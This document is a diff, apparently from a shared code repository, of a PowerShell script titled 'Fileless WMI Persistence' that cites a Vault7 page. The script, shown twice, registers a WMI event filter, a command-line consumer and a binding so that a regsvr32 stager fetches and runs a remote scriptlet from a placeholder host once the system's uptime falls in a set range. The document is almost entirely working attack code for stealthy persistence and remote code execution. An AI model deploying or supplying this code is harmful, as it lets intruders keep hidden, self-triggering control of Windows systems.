infosecn1nja · May 14, 2018 15:12
diff --git a/WMI-Persistence.ps1 b/WMI-Persistence.ps1
 # Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
 # https://wikileaks.org/ciav7p1/cms/page_14587908.html

 <#
 .SYNOPSIS
 This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds.  The event will trigger only once.  
 #>

 $EventFilterName = "Fileless WMI Persistence SystemUptime"

 $StagerPayload = "C:\Windows\System32\regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll"

 # Create event filter
 $EventFilterArgs = @{
    EventNamespace = 'root/cimv2'
    Name = $EventFilterName
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
    QueryLanguage = 'WQL'
 }

 $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

 # Create CommandLineEventConsumer
 $CommandLineConsumerArgs = @{
    Name = $EventConsumerName
    CommandLineTemplate = $StagerPayload
 }

 $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

 # Create FilterToConsumerBinding
 $FilterToConsumerArgs = @{
    Filter = $Filter
    Consumer = $Consumer
 }

 $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs
	# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
	# https://wikileaks.org/ciav7p1/cms/page_14587908.html

	<#
	.SYNOPSIS
	This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
	#>

	$EventFilterName = "Fileless WMI Persistence SystemUptime"

	$StagerPayload = "C:\Windows\System32\regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll"

	# Create event filter
	$EventFilterArgs = @{
	EventNamespace = 'root/cimv2'
	Name = $EventFilterName
	Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
	QueryLanguage = 'WQL'
	}

	$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

	# Create CommandLineEventConsumer
	$CommandLineConsumerArgs = @{
	Name = $EventConsumerName
	CommandLineTemplate = $StagerPayload
	}

	$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

	# Create FilterToConsumerBinding
	$FilterToConsumerArgs = @{
	Filter = $Filter
	Consumer = $Consumer
	}

	$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs